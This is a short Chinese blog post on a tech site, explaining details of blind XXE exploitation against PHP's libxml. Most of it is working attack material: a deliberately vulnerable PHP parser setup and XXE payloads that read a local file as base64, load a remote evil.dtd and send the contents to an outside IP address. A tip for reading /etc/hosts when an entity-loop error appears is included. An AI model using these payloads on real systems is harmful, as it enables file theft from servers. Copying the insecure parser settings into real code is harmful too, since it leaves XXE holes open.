安科网

blind-XXE的几个细节

新媒体运营营销指南

新媒体运营营销指南

2018-03-29

关注 关注

在libxml>=2.9.0以后的版本默认不开启外部实体解析,需要添加参数开启

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%all;
]>
<c>&send;</c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);#print_r($data);<br />
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://192.168.156.77/?%file;'>"
>
<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%send;
]>
<c></c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
#print_r($data);
<!ENTITY % all
"<!ENTITY &#37; send SYSTEM 'http://192.168.156.77/?%file;'>"
>

如果有类似如下报错,尝试换/etc/hosts读取,可能是防止指数放大攻击,对内容长度做了限制。

Detected an entity reference loop in http://192.168.125.133:8081/evil.dtd
blind-XXE的几个细节
新媒体运营营销指南

新媒体运营营销指南

0 关注 0 粉丝 0 动态

关注 关注
新媒体运营营销指南

新媒体运营营销指南

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号